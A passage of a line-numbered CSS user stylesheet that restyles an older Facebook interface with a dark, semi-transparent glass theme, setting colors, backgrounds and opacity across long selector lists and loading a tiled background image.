dd, .current_city dd, .UIIntentionalStory_Message, .UIFilterList_Selected a, .UIHomeBox_Title, .suggestion, .spell_suggest, .UIStoryAttachment_Caption, .fexth + td, .fext_short, #fb_menu_inbox_unread_count, .Tabset_selected .arrow .sel_link span, .UISelectList_check_Checked, .chat_fl_nux_header, .friendlist_status .title a, .chat_setting label, .UIPager_PageNum, .good_username, .UIComposer_AttachmentTitle, .rsvp_option:hover label, .Black, .comment_author span, .fan_status_inactive, .holder, .UIThumbPagerControl_PageNumber, .text_center, .nobody_selected, .email_promise, .blocklist ul, #advanced_body_1 label, .continue, .empty_albums, div[style*="color: black"], .GBThreadMessageRow_Body_Content, .UIShareStage_Subtitle, #public_link_photo span, .GenericStory_Message, .UIStoryAttachment_Value, div[style*="color: black"], .SearchPage_EmailSearchTitle, .uiTextSubtitle, .jewelHeader, .recent_activity_settings_label, .people_list_item, .uiTextTitle, .tab_box, .instant_personalization_title, .MobileMMSEmailSplash_Description, .MobileMMSEmailSplash_Tipsandtricks_Title, .fcb, input[value="Find Friends"], #bodyContent, #bodyContent table, h6, .fbChatBuddylistError, .info dt, .bfb_options_minimized_hide, .connect_widget_connected_text, body.transparent_widget .connect_widget_not_connected_text, .connect_widget_button_count_count, .fbInsightsStatisticNumber, .fbInsightsTable thead th span, .header span, .friendlist_name a, .count .countValue, .uiHeaderTitle span, #about_text_less span, .uiStreamHeaderText, .navHeader, .uiAttachmentTitle, .fbProfilePlacesFilterText, .tagName, .ufb-dataTable-header-text, .ufb-text-content, .fb_content, .uiComposerAttachment .selected .attachmentName {color: #fff !important;}
  1447.  
  1448.  
  1449.  
  1450.  
  1451.  
  1452.  
  1453.  
  1454. .mp3player_holder {background: #fff !important;opacity: .55;}
  1455.  
  1456. .bfb_post_action_container {opacity: .25 !important;}
  1457.  
  1458. .bfb_post_action_container:hover {opacity: 1 !important;}
  1459.  
  1460.  
  1461.  
  1462.  
  1463.  
  1464. .valid, .wallheader small, #photodate, .video_timestamp strong, .date_divider span, .feed_msg h5, .time, .item_contents, .boardkit_topic_updated, .walltime, .feed_time, .story_time, #status_time_inner, .written small, .date, div[style*="color: rgb(85, 82, 37)"], .timestamp span, .time_stamp, .timestamp, .header_info_timestamp, .more_info div, .timeline, .UIIntentionalStory_Time, .fupdt, .note_timestamp, .chat_info_status_time, .comment_actions, .UIIntentionalStory_Time a, .UIUpcoming_Time, .rightlinks, .GBThreadMessageRow_Date, .GenericStory_Time a, .GenericStory_Time, .fbPrivacyPageHeader, .date_divider {color: #6699FF !important;}
  1465.  
  1466.  
  1467.  
  1468. .textinput, select, .list_drop_zone, .msg_divide_bottom, textarea, input[type="text"], input[type="file"], input[type="search"], input[type="input"], .inputtextX, input[type="password"], .space, .tokenizer, input[type="hidden"], #flm_new_input, .UITooltip:hover, .UIComposer_InputShadow, .searchroot input, input[name="search"], .uiInlineTokenizer, input.text, input.nosave {background: rgba(0,0,0,.50) !important;-moz-appearance:none!important;color: #bbb !important;border: none !important;padding: 3px !important; }
  1469.  
  1470.  
  1471.  
  1472. input[type="text"]:focus, textarea:focus, .fbChatSidebar .fbChatTypeahead .textInput:focus {box-shadow: 0 0 .5em #99CCFF, inset 0 0 .25em #6699FF !important;}
  1473.  
  1474.  
  1475.  
  1476.  
  1477.  
  1478. .uiOverlayPageWrapper, #fbPhotoSnowlift, .shareOverlay {background: -moz-radial-gradient(50% 50%, circle, rgba(10,10,10,.6), rgba(10,10,10,1) 90%) !important;}
  1479.  
  1480.  
  1481.  
  1482.  
  1483.  
  1484. .bumper, .stageBackdrop {background: #000 !important;}
  1485.  
  1486.  
  1487.  
  1488. #pageNav .tinyman:hover a, #navHome:hover a, #navAccount:hover, #navAccount.openToggler, .checkableListItem:hover a, .selectedCheckable, .selectedCheckable a {background: #6699FF !important;}
  1489.  
  1490.  
  1491.  
  1492. .GBSearchBox_Input, .tokenizer, .LTokenizerWrap, #mailBoxItems li a:hover, .uiTypeaheadView .search .selected, .itemAnchor:hover, .notePermalinkMaincol .top_bar, .notification:hover a, #bfb_tabs div:not(.bfb_tab_selected), .bfb_tab, .navIdentity form:hover, .connect_widget_not_connected_text, .uiTypeaheadView li.selected, .connect_widget_number_cloud, .placesMashCandidate:hover, .highlight, #bfb_option_list li a:hover {background: rgba(0,0,0,.5) !important;}
  1493.  
  1494.  
  1495.  
  1496. .results .page, .calltoaction, .results li, .fbNubFlyout, .contextualBlind, .bfb_dialog, .bfb_image_preview, input.text, .fbChatSidebar, .jewelBox, .clickToTagMessage, .tagName, .ufb-tip-body, .flyoutContent, .fbTimelineMapFilterBar, .fbTimelineMapFilter, .fbPhotoStripTypeaheadForm, .groupsSlimBarTop {background: rgba(10,10,10,.75) !important;}
  1497.  
  1498.  
  1499.  
  1500. #home_filter_list, #home_sidebar, #contentWrapper, .LDialog, .dialog-body, .LDialog, .LJSDialog, .dialog-foot, .chat_input, #contentCol, #leftCol, .UIStandardFrame_Content, .red_box, .yellow_box, .uiWashLayoutOffsetContent, .uiOverlayContent, .bfb_post_action_container, .connect_widget_button_count_count, .shaded, .navIdentitySub, .jewelItemList li a:hover, .fbSidebarGripper div, .jewelCount, .uiBoxRed, .videoUnit, .lifeEventAddPhoto, .fbTimelineLogIntroMegaphone {background: rgba(10,10,10,.50) !important;}
  1501.  
  1502.  
  1503.  
  1504. #home_stream, pre, .ufiItem, .odd, .uiBoxLightblue, .platform_dialog_bottom_bar, .uiBoxGray, .fbFeedbackPosts, .mall_divider_text, .uiWashLayoutGradientWash, #bfb_options_body, .UIMessageBoxStatus, .tip_content .highlight, .fbActivity, .auxlabel, .signup_bar_container, #wait_panel, .FBAttachmentStage, .sheet, .uiInfoTable .name, .HCContents, #devsiteHomeBody .content, .devsitePage .nav .content, #confirm_phone_frame, .fbTimelineCapsule .timelineUnitContainer, .timelineReportContainer, .aboveUnitContent, .aboutMePagelet, #pagelet_tab_content_friends, #fbProfilePlacesBorder, #pagelet_tab_content_notes, .externalShareUnit, .fbTimelineNavigationWrapper .detail, .tosPaneInfo, .navSubmenu:hover, #bfb_donate_pagelet > div, .better_fb_mini_message, .uiBoxWhite, .uiLoadingIndicatorAsync, .mleButton, .fbTimelineBoxCount, .navSubmenu:hover, .gradient, .profileBrowserGrid tr > td > div {background: rgba(20,20,20,.4) !important;}
  1505.  
  1506.  
  1507.  
  1508.  
  1509.  
  1510. .feed_comments, .home_status_editor, #rooster_container, .rooster_story, .UIFullPage_Container, .UIRoundedBox_Box, .UIRoundedBox_Side, .wallpost, .profile_name_and_status, .tabs_wrapper, .story, #feedwall_controls, .composer_well, .status_composer, .home_main_item, .feed_item, .HomeTabs_tab, #feed_content_section_applications li, .menu_separator, a[href="/friends"], .feed_options_link, .show_all_link, .status, #newsfeed_submenu, .morecontent_toggle_link, .more_link, .composer_tabs, .bl, .profile_tab, .story_posted_item, .left_column, .pager_next, .admarket_ad, .box, .inside, .shade_b, .who_can_tab, .summary_simple, .footer_submit_rounded, .well_content, .info_section, .item_content, .basic_info_summary_and_viewer_actions dt, .info dt, .photo_table, .extra_content, .main_content, .search_inputs, .search_results, .result, .bar, .smalllinks span, .quiz_actionbox, .column, .note_header, .fdh, #fpgc, #fpgc td, .fmp, .fadvfilt, .fsummary, .frn, .two_column_wrapper, #new_ff, .see_more, .message_rows, .message_rows tr, .toggle_tabs li, .toggle_tabs li a, .notifications, .updates_all, .composer, .WelcomePage_MainSellContainer, .WelcomePage_MainSell, .media_gray_bg, .photo_comments_container, .photo_comments_main, .empty_message, .UIMediaHeader_Title, .UIMediaHeader_SubHeader, .footer_bar, .single_photo_header, #editphotoalbum, .covercheck, #newalbum, .panel, .album, .dh_titlebar, .page_content, .dashboard_header, .photos_header, .privacy_summary_items, .privacy_summary_item, .block_overview, .privacy_page_field, .editor_panel, .block, .action_box, .even_column, .mobile_account_inlay, .language, .confirm_boxes, .confirm, .status_confirm, .hasnt_app, .container, .UIDashboardHeader_TitleBar, .UIDashboardHeader_Container, .note, .UITwoColumnLayout_Container, .dialog_body, .dialog_buttons, .group_lists, .group_lists th, .group_list, .updates, .share_section, #profilenarrowcolumn, #profilewidecolumn, #inline_wall_post, .post_link_bar, .helppro_content, .answers_list_header, #help_titlebar, .new_user_guide, .new_user_guide_content, .flag_nav_item, .flag_nav_item a, .arrowlink a, #safety_page, #safety_page h5, .dashbar, .disclaimer, #store_options, #store_window, .step, .canvas_rel_positioning, .app_type a, .sub_selected a, .box_head, .inside_the_box, .app_about, .fallback, .box_subhead, .fbpage_card, #devsite_menubar, .content_sidebar, .side, .pBody li a, #p-logo, #p-navigation, #p-navigation .pBody, #bodyContent h1, #p-wiki, #p-wiki .pBody, #p-search, #p-search .pBody, #p-tb, #p-tb .pBody, #bodyContent table, #bodyContent table div, .recent_news, .main_news, .news_header, .devsite_subtabs li a, .middle-container, .feed_msg h4, .ads_info, .contact_sales, .wrapper h3, .presence_bar_button:hover, .icon_garden_elem:hover, #profile_minifeed, .focused, .dialog_summary, .tab span, .wallkit_postcontent h4, .address, #badges, .badge_holder, .aim_link, .user_status, .section_editor, .my_numbers, .photo_editor, .gift_rows, .sub_menu, .main-nav-tabs li a, .submenu_header, .new_gift, #profile_footer_actions, #status_bar, #summaryandpager, .userlist, #feedBody, #feedHeaderContainer, #feedContent, .feedBackground, .mixer_panel, .titles, .sliders, .slider_holder, .fbpage_title, .options, #linkeditorform, .sideNavItem .item, .typeahead_list_with_shadow, .module, .tc, .bc, .footer, .answer, .announcement, .basic_info_content, .slot, .boardkit_no_topics, .ranked_friend, .boardkit_subtitle, .filter-tabs, .level, .level_summary, .cause, .attachment_stage, .attachment_stage_area, .beneficiary_info, #info_tab, #feedwall_with_composer, .frni, .frni a, .flistedit, .fmp_delete, #feed_content_section_friend_lists li, .composer_tabs li:not(.selected), .menu_content li a, .view_on, .rounded-box, .ffriend, .tab_content, .wrapper_background, .full_container, .white_box, #friends li a, #inline_composer, .skin_body, .invite_tab_selected, .inside table, .matches_matches_box, .matches_content_box_subtitle, tr[fbcontext="41097bfeb58d"], .dialog_body div div, .new_menu_off, .present_info_label, .import_status, .upload_guidelines, .tagger_border, .chat_info, .chat_conv_content, .chat_conv, .visibility_change, .pic_padding, .chat_notice, .chat_input_div, .wrapper, .toolbar_button, .toolbar_button_label, .pages_dashboard_panel, .no_pages, .divider, #filterview, #groupslist, .grouprow, .grouprow table, .board_topic, #big_search, #invitation_list, #invitation_wrapper, .emails_error, .outer_box, .inner_box, .frame, .days_remaining, .module, .submodule, .ntab, .ntab .tab_link, .grayheader, .inline_wall_post, .related_box, .home_box_wrapper, .two_column, .challenge_stats, .quiz_box, #fb_challenge, #fb_challenge_page, .challenge_leaderboard, .leaderboard_tile, .sidebar_upsell, .concerts_module, .container_box, #login_homepage, .user_hatch_bg, .pick_main, #homepage, .wall_post_body, .track, .HomeTabs_tab a, .minifeed, .alert_wrap, .logged_in_vertical_alert, .info_column, #public_listing_friends, #public_listing_pages, .gamertag_app, .gamerProfileBody, #photo_picker, .album_picker .page0 .row, .dialog_loading, .timeline, .partyrow, .partyrow table, #invite_list li, .group_info_section, #moveable_wide, .UIProfileBox_Content, .story_content, .settings_panel, .app_browser li, .photos_tab, .recent_notes, .side_note, .album_information, .results, .logged_out_register_vertical, .logged_out_register_wrapper, .deleted, .home_prefs_saved, .share_send, .header_divide, .thread_header, .message, .status_composer_inner, .fbpage_edit_header, .app_switcher_unselected, .status_placeholder, .UIComposer_TDTextArea, .UIHomeBox_Content, .UIHotStory, .home_welcome, .summary_custom, .source_list, .minor_section, .UIComposer_Attachment_TDTextArea, .info_diff span, .matches span, .menu_content, .UIcomposer_Dropdown_List, .UIComposer_Dropdown_Item, .feed_auto_update_settings, .container, .silver_footer, .friend_grid_col, .token > span, .tokenizer_input, .tokenizer_input *, #friends_multiselect, .flink_inner a:hover, #grouptypes, #startagroup p, .UICheckList, .FriendAddingTool_InnerMenu, .pagerpro li a:hover, #friend_filters, .fb_menu_count_holder, .hp_box, .view_all_link, .app_settings_tab, .tab_link, #flm_add_title, #flm_current_title, #flm_list_selector .selector, #friends_header, #friends_wrapper, .contacts_header, .contacts_wrapper, .row1, .show_advanced_controls, .FriendAddingTool_InnerMenu, .UISelectList, .UISelectList_Item, .UIIntentionalStory_CollapsedStories, .email_section, .section_header_bg, .rqbox, .ar_highlight, #buddy_list_panel, .panel_item, .friendlist_status, .options_actions a span, .chat_setting label, .toolbox, .chat_actions, .UIWell, .UIComposer_InputArea, .invite_panel, .apinote, .UIInterstitialBox_Container, .ical_section, .maps_brand, .divbox4, .lighteryellow, .fan_status_inactive, .UIBeeperCap, .footer_fallback_box, .footer_refine_search_company_school_box, .footer_refine_search_email_box, .UINestedFilterList_List, .UINestedFilterList_SubItem, .UINestedFilterList_Item_Link, .UINestedFilterList_Item_Link, .UINestedFilterList_SubItem_Link, .app_dir_app_summary, .app_dir_featured_app_summary, .app_dir_app_wide_summary, .profile_top_bar_container, .UIStream_Border, .question_container, .unselected_list label:nth-child(odd), .request_box, .showcase, .steps li, #fb_sell_profile div, .promotion, .UIOneOff_Container tabs, .whocan, .lock_r, .privacy_edit_link, .friend_list_container li:hover a, .email_field, .app_custom_content, #page, .thumb, .step_frame, .radioset, .radio_option, .page_option, .explanation_note, .card, .empty_albums, .right_column, .full_widget, .connect_top, .creative_preview, .creative_column, .UIAdmgrCreativePreview, .UIEMUASFrame, .banner_wrapper, .dashboard, .pages, #photocrop_instructions, .UIContentBox_GrayDarkTop, .UIContentBox_Gray, .UIContentBox, #FriendsPage_ListingViewContainer, .post_editor, .entry, .fb_dashboard, .spacey_footer, .thread, .post, .UIWashFrame_Content, table[bindpoint="thread_row"], table[bindpoint="thread_row"] tbody, .GBThreadMessageRow, .message_pane, .UIComposer_ButtonArea, .UIRoundedTransparentBox_Border, .feedbackView, .group, .streamPaginator, .nullStatePane, .inboxControls, .filterControls, .inboxView tr, .tabView, .tabView li a, .splitViewContent, .photoGrid, .albumGrid, .frame .img, .gridViewCrop, .gridView, .profileWall form, .story form, .formView, .inboxCompose, .LTokenizerToken, #icon_garden, #buddy_list_tab, #presence_notifications_tab, #editphotoalbum .photo, .likes, .UISuggestionList_SubContainer, .fan_action, .video_pane, .notify_option, .video_gallery, .video, .uiTooltip:not(.close):hover, .people_table, .people_table table, #main, #navlist li a.inactive, #rbar, .plays_bar, #fans, .updates_messages, .sent_updates_container, .subitem, #pagelet_navigation, .fbxWelcomeBox, .friends_online_sidebar, .uiTextHighlight, .tab_box, .bordered_list_item, .SettingsPage_PrivacySections, .profile-pagelet-section, .profileInfoSection, #pts_invite_section, .main_body, .masterControl, .masterControl .main, .linkbox, .uiTypeaheadView .search li, .language_form, #ads_privacy_examples, .fbPrivacyPage, .UIStandardFrame_SidebarAds, #sidebar_ads, #globalWrapper #content, .portlet, .pBody, .noarticletext, #catlinksm, .devsiteHeader, .devsiteFooter, .devsiteContent, .blockpost, .blockpost #topic, .blockpost .postleft, .blockpost .postfootleft, .fbRecommendation, .fbRecommendationWidgetContent, .add_comment, .connect_comment_widget .comment_content, .error, .even, .fbFeedbackPager, .uiComposerMessageBox, .facepileHolder, .notePermalinkMaincol, .profilePreviewHeader, .pageAttachment, .editExperienceForm, .tourSteplist, .tourSteplist ol, .uiStep, .uiStep:not(.uiStepSelected) .part, .uiStepSelected .part:not(.middle), .better_fb_cp, legend, .bfb_option_body div, .messaging_nux_header, .fbInsightsTable .odd td, .user.selected, .highlighter div b, .fbQuestionsBlingBox:hover, .friend_list_container, .jewelItemList li a:active, #bfb_tip_pagelet > div, .UIUpcoming_Item, .video_with_comments, .video_info, .fbFeedTickerStory, .fbFeedTicker.fixed_elem, .fbxPhoto .fbPhotoImageStage .stageContainer, #DeveloperAppBody > .content, .opengraph .preview, .coverNoImage, .fbTimelineScrubber, .fbTimelineSection, .fbTimelineAds, .fbProfilePlacesFilter, .fbFeedbackPost .UIImageBlock_Content, .permissionsViewEducation, .UIFaq_Container, #wizard, .captionArea, #bfb_options_content .option, .bfb_tab_selector, .UIMessageBoxExplanation {background: rgba(20,20,20,.2) !important;}
  1511.  
  1512.  
  1513.  
  1514. .uiSelector .uiSelectorButton, .UIRoundedBox_Corner, .quote, .em, .UIRoundedBox_TL, .UIRoundedBox_TR, .UIRoundedBox_BR, .UIRoundedBox_LS, .UIRoundedBox_BL, .profile_color_bar, .pagefooter_topborder, .menu_content, h3, #feed_content_section_friend_lists, ul, li[class=""], .comment_box, .comment, #homepage_bookmarks_show_more, .profile_top_wash, .canvas_container, .composer_rounded, .composer_well, .composer_tab_arrow, .composer_tab_rounded, .tl, .tr, .module_right_line_block, .body, .module_bottom_line, .lock_b_bottom_line, #info_section_info_2530096808 .info dt, .pipe, .dh_new_media, .dh_new_media .br, .frn_inpad, #frn_lists, #frni_0, .frecent span, h3 span, .UIMediaHeader_TitleWash, .editor_panel .right, .UIMediaButton_Container tbody *, #userprofile, .profile_box, .date_divider span, .corner, .profile #content .UIOneOff_Container, .ff3, .photo #nonfooter #page_height, .home #nonfooter #page_height, .home .UIFullPage_Container, .main-nav, .generic_dialog, #fb_multi_friend_selector_wrapper, #fb_multi_friend_selector, .tab span, .tabs, .pixelated, .disabled, .title_header .basic_header, #profile_tabs li, #tab_content, .inside td, .match_link span, tr[fbcontext="41097bfeb58d"] table, .accent, #tags h2, .read_updates, .user_input, .home_corner, .home_side, .br, .share_and_hide, .recruit_action, .share_buttons, .input_wrapper, .status_field, .UIFilterList_ItemRight, .link_btn_style span, .UICheckList_Label, #flm_list_selector .Tabset_selected .arrow, #flm_list_selector .selector .arrow .sel_link, .friendlist_status .title a, .online_status_container, .list_drop_zone_inner, .good_username, .WelcomePage_Container, .UIComposer_ShareButton *, .UISelectList_Label, .UIComposer_InputShadow .UIComposer_TextArea, .UIMediaHeader_TitleWrapper, .boxtopcool_hg, .boxtopcool_trg, .boxtopcool_hd, .boxtopcool_trd, .boxtopcool_bd, .boxtopcool_bg, .boxtopcool_b, #confirm_button, .title_text, #advanced_friends_1, .fb_menu_item_link, .fb_menu_item_link small, .white_hover, .GBTabset_Pill span, .UINestedFilterList_ItemRight, .GBSearchBox_Input input, .inline_edit, .feedbackView .comment th div, .searchroot, .composerView th div, .reply th div, .LTokenizer, .Mentions_Input, form.comment div, .ufi_section, .BubbleCount, .BubbleCount_Right, .UIStory, .object_browser_pager_more, .friendlist_name, .friendlist_name a, .switch, #tagger, .tagger_border, .uiTooltip, #reorder_fl_alert, .UIBeeper_Full, #navSearch, #navAccount, #navAccountPic, #navAccountName, #navAccountInfo, #navAccountLink, #mailBoxItems, #pagelet_chat_home h4, .buddy_row, .home_no_stories, .lfloat, #xpageNav li .navSubmenu, .uiListItem:not(.ufiItem), .uiBubbleCount, .number, .fbChatBuddylistPanel, .wash, .settings_screenshot, .privacyPlan .uiListItem:hover, .no_border, .auxiliary .highlight, .emu_comments_box_nub, .numberContainer, .uiBlingBox, .uiBlingBox:hover span, .callout_buttons, .uiWashLayoutEmptyGradientWash, .inputContainer, .editNoteWrapperInput, .fbTextEditorToolbar, .logoutButton input, #contentArea .uiHeader + .uiBoxGray, .uiTokenizer, #bfb_tabs, .profilePictureNuxHighlight, .profile-picture, #ci_module_list, .textBoxContainer, #date_form .uiButton, .insightsDateRange, .MessagingReadHeader, .groupProfileHeaderWash, .questionSectionLabel, .metaInfoContainer, .uiStepList ol, .friend_list, .fbFeedbackMentions, .bb .fbNubFlyoutHeader, .bb .fbNubFlyoutFooter, .fbNubFlyoutInner .fbNubFlyoutFooter, .gradientTop, .gradientBottom, .helpPage, .fbEigenpollTypeahead .plus, .uiSearchInput, .opengraph, #developerAppDetailsContent, .timelineLayout #contentCol, .attachmentLifeEvents, .fbProfilePlacesFilterBar, .uiStreamHeader, .uiStreamHeaderChronologicalForm, .inner .text, .pageNotifPopup, .uiButtonGroup, .navSubmenuPageLink, .fbTimelineTimePeriod, .bornUnit, .mleFooter, #bfb_filter_add_row, #bfb_options .option .no_hover, .fbTimelinePhotosSeparator h4 span, .withsubsections, .showMore, .event_profile_information tr:hover, .nux_highlight_nub, .uiSideNav .uiCloseButton, .uiSideNav .uiCloseButton input, .fb_content, .uiComposerAttachment .selected .attachmentName, .fbHubsTokenizer, .coverEmptyWrap, .uiStreamHeaderText {background: transparent !important;}
  1515.  
  1516.  
  1517.  
  1518. .UIObject_SelectedItem, .sidebar_item_header, .announcement_title, #pagefooter, .selected:not(.key-messages):not(.key-events):not(.key-media):not(.key-ff):not(.page):not(.group):not(.user):not(.app), .date_divider_label, .profile_action, .blurb ,.tabs_more_menu, .more a span, .selected h2, .column h2, .ffriends, .make_new_list_button_table tr, .title_header, .inbox_menu, .side_column, .section_header h3 span, .media_header, .wallheader, #album_container, .note_dialog, .dialog, .has_app, .UIMediaButton_Container, .dialog_title, .dialog_content, #mobile_notes_announcement, .see_all, #profileActions, .fbpage_group_title, .UIProfileBox_SubHeader, #profileFooter, .share_header, #share_button_dialog, .flag_nav_item_selected, .new_user_guide_content h2, #safety_page h4, .section_banner, .box_head, #header_bar, .content_sidebar h3, .content_header, #events h3, #blog h3, .footer_border_bottom, .firstHeading, #footer, .recent_news h3, .wrapper div h2, .UIProfileBox_Header, .box_header, .bdaycal_month_section, #feedTitle, .pop_content, #linkeditor, .UIMarketingBox_Box, .utility_menu a, .typeahead_list, .typeahead_suggestions, .typeahead_suggestion, .fb_dashboard_menu, .green_promotion, .module h2, .current_path, .boardkit_title, .filter-tabs .current, .see_all2, .plain, .share_post, .add-link, li.selected, .active_list a, #photoactions a:not(#rotaterightlink):not(#rotateleftlink), .UIPhotoTagList_Header, .dropdown_menu, .menu_content, .menu_content li a:hover, .menu_content li:hover, #edit_profilepicture, .menu_content div a:hover, .contact_email_pending, .req_preview_guts, .inputbutton, .inputsubmit, .activation_actions_box, .wall_content, .matches_content_box_title, .new_menu_selected, #editnotes_content, #file_browser, .chat_window_wrapper, .chat_window, .chat_header, .hover, .dc_tabs a, .post_header, .header_cell, #error, .filters, .pages_dashboard_panel h2, .srch_landing h2, .bottom_tray, .next_action, .pl-divider-container, .sponsored_story, .header_current, .discover_concerts_box, .header, .sidebar_upsell_header, .activity_title h2, .wall_post_title, #maps_options_menu, .menu_link, .gamerProfileTitleBar, .feed_rooster , .emails_success, .friendTable table:hover, .board_topic:hover, .fan_table table:hover, #partylist .partyrow:hover, .latest_video:hover, .wallpost:hover, .profileTable tr:hover, .friend_grid_col:hover, .bookmarks_list li:hover, .requests_list li:hover, .birthday_list li:hover, .tabs li, .composer_tab_arrow:hover, .fb_song:hover, .share_list .item_container:hover, .written a:hover, #photos_box .album:hover, .people .row .person:hover, .group_list .group:hover, .confirm_boxes .confirm:hover, .posted .share_item_wide .share_media:hover, .note:hover, .editapps_list .app_row:hover, .my_networks .blocks .block:hover, .mock_h4, #notification_options tr:hover, .notifications_settings li:hover, .mobile_account_main h2, .language h4, .products_listing .product:hover, .info .item .item_content:hover, .info_section:hover, .recent_notes p:hover, .side_note:hover, .suggestion, .story:hover, .post_data:hover, .album_row:hover, .track:hover, .box div[style="float: left;padding-right: 4px;padding-bottom: 10px;"]:hover, #pageheader, .message:hover, .app_switcher_button, .UIComposer_Button, .UIFilterList_Selected, .UIFilterList_Item a:hover, .UIHotStory:hover, .UIHomeBox_Top, .UIComposer_AttachmentArea, input[type="submit"]:not(.fg_action_hide):not(.stat_elem):not([name="add"]):not([name="actions[reject]"]):not([name="actions[accept]"]):not([value="Find Friends"]):not([value="Share"]):not([value="Maybe"]):not([value="No"]):not([value="Yes"]):not([value="Comment"]):not([value="Reply"]):not([value="Flag"]):not([type="submit"]), .UIComposer_Attachment_TDButton, .UIComposer_Attachment_ButtonContainer, .UITabGrid_Link:hover, .UIActionButton, .UIActionButton_Link, .confirm_button, .silver_dashboard, span.button, .col:hover, #photo_tag_selector, #pts_userlist, .flink_dropdown, .flink_inner, .grouprow:hover, #findagroup h4, #startagroup h4, .actionspro a:hover, .UIActionMenu_Menu, .UICheckList_Label:hover, .make_new_list_button_table, .contextual_dialog_content, #flm_list_selector .selector:hover, .show_advanced_controls:hover, .UISelectList_check_Checked, .section_header, .section_header_bg, #buddy_list_panel_settings_flyout, .options_actions, .chat_setting, .flyout, .flyout .UISelectList, .flyout .new_list, #tagging_instructions, .FriendsPage_MenuContainer, .UIActionMenu, .UIObjectListing:hover, .UIStory_Hide .UIActionMenu_Wrap, .UIBeeper, .branch_notice, .async_saving, .UIActionMenu .UIActionMenu_Wrap:hover, .attachment_link a:hover, .UITitledBox_Top, .UIBeep, .Beeps, #friends li a:hover, .apinote h2, .UIActionButton_Text, .rsvp_option:hover, .onglettrhi, .ongletghi, .ongletdhi, .ongletg, .onglettr, .ongletd, .confirm_block, .unfollow_message, .UINestedFilterList_SubItem_Selected .UINestedFilterList_SubItem_Link, .UINestedFilterList_SubItem_Link:hover, .UINestedFilterList_Item_Link:hover, .UINestedFilterList_Selected .UINestedFilterList_Item_Link, .app_dir_app_summary:hover, .app_dir_featured_app_summary:hover, .app_dir_app_wide_summary:hover, .UIStory:hover, .UIPortrait_TALL:hover, .UIActionMenu_Menu div, .UIButton_Blue, .UIButton_Gray, .quiz_cell:hover, .UIFilterList > .UIFilterList_Title, .message_rows tr:hover, .ntab:hover, .thumb_selected, .thumb:hover, .hovered a, .pandemic_bar, .promote_page, .promote_page a, .create_button a, .nux_highlight, .UIActionMenu_Wrap, .share_button_browser div, .silver_create_button, .painted_button, .flyer_button, table[bindpoint="thread_row"] tbody tr:hover, .GBThreadMessageRow:hover, #header, .button:not(.close):not(.uiSelectorButton), h4, button:not(.as_link), #navigation a:hover, .settingsPaneIcon:hover, a.current, .inboxView tr:hover, .tabView li a:hover, .friendListView li:hover, .LTypeaheadResults, .LTypeaheadResults a:hover, .dialog-title, .UIComposer_PrivacyCallout_Text, .UIIntentionalStream_Top, .UISuggestionList_SubContainer:hover, .typeahead_message, .progress_bar_inner, .video:hover, .advanced_controls_link, .UIComposer_PrivacyCallout, .plays_val, .lightblue_box, .FriendAddingTool_InnerMenu .UISelectList, .gray_box, .uiButton:not(.uiSelectorButton), .fbPrivacyWidget .uiSelectorButton:not(.lockButton), .uiButtonSuppressed, #navAccount li:not(#navAccountInfo), .jewelHeader, .seeMore, #mailBoxItems li, #pageFooter, .uiSideNav .key-nf:hover, .key-messages .item:hover, .key-messages ul li:hover, .key-events ul li:hover, .key-media ul li:hover, .key-ff ul li:hover, .key-apps:hover, .key-games:hover, .uiSideNav .sideNavItem:not(.open) .item:hover, .fbChatOrderedList .item:hover a, .uiHeader, .uiListItem:not(.mall_divider):hover, .uiSideNav li.selected > a, .ego_unit:hover, .results, .bordered_list_item:hover, .fbConnectWidgetFooter, #viewas_header, .fbNubFlyoutTitlebar, .fbNubFlyoutBody, .info_text, .stage, .masterControl .selected a, .masterControl .controls .item a:hover, .uiTypeaheadView .search, .gigaboxx_thread_hidden_messages, .uiMenu, .uiMenuInner, .itemAnchor, .gigaboxx_thread_branch_message, .uiSideNavCount, .uiBoxYellow, .loggedout_menubar_container, .pbm .uiComposer, .megaphone_box, .uiCenteredMorePager, .fbEditProfileViewExperience:hover, .uiStepSelected .middle, .GM_options_header, .bfb_tab_selected, #MessagingShelfContent, .connect_widget_like_button, .uiSideNav .open, .fbActivity:hover, .fbQuestionsPollResultsBar, .insightsDateRangeCustom, .fbInsightsTable thead th, .mall_divider, .attachmentContent .fbTabGridItem:hover, .jewelItemNew, #MessagingThreadlist .unread, .type_selected, .bfb_sticky_note, .UIUpcoming_Item:hover, .progress_bar_outer, .fbChatBuddyListDropdown .uiButton, .UIConnectControlsListSelector .uiButton, .instructions, .uiComposerMetaContainer, .uiMetaComposerMessageBoxShelf, #feed_nux, #tickerNuxStoryDiv, .fbFeedTickerStory:hover, .fbCurrentStory:hover, .uiStream .uiStreamHeaderTall, .fbChatSidebarMessage, .fbPhotoSnowboxInfo, .devsitePage .menu, .devsitePage .menu .content, #devsiteHomeBody .wikiPanel > div, .toolbarContentContainer, .fbTimelineUnitActor, #fbTimelineHeadline, .fbTimelineNavigation, .fbTimelineFeedbackActions, .timelineReportHeader, .fbTimelineCapsule .timelineUnitContainer:hover, .timelineReportContainer:hover, .fbTimelineComposerAttachments .uiListItem:hover span a, .timelinePublishedToolbar, .timelineRecentActivityLabel, .fbTimelineMoreButton, .overlayTitle, .friendsBoxHeader, .escapeHatchHeader, .tickerStoryAllowClick, .appInvite:hover, .fbRemindersStory:hover, .lifeEventAddPhoto a:hover, .insights-header, .ufb-dataTable-header-container, .ufb-button, .older-posts-content, .mleButton:hover, .btnLink
  1519.  
  1520. {
  1521.  
  1522. background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png") fixed repeat !important;
  1523.  
  1524. }
  1525.  
  1526.  
  1527.  
  1528. .hovercard .stage, .profileChip, .GM_options_wrapper_inner, .MessagingReadHeader .uiHeader, #MessagingShelf, #navAccount ul, .uiTypeaheadView, #blueBar, .uiFacepileItem .uiTooltipWrap, .fbJewelFlyout, .jewelItemList li, .notification:not(.jewelItemNew), .fbNubButton, .fbChatTourCallout .body, .uiContextualDialogContent, .fbTimelineStickyHeader .back, .timelineExpandLabel:hover, .pageNotifFooter a, .fbSettingsListLink:hover, .uiOverlayPageContent, #bfb_option_list, .fbPhotoSnowlift .rhc, .ufb-tip-title
  1529.  
  1530. {
  1531.  
  1532. background: url("http://i795.photobucket.com/albums/yy232/DaedalusIcarusHelios/Wallpaper/GlassShiny.png") fixed repeat, rgba(10,10,10,.6) !important;
  1533.  
  1534. }
  1535.  
  1536.  
  1537.  
  1538.  
  1539.  
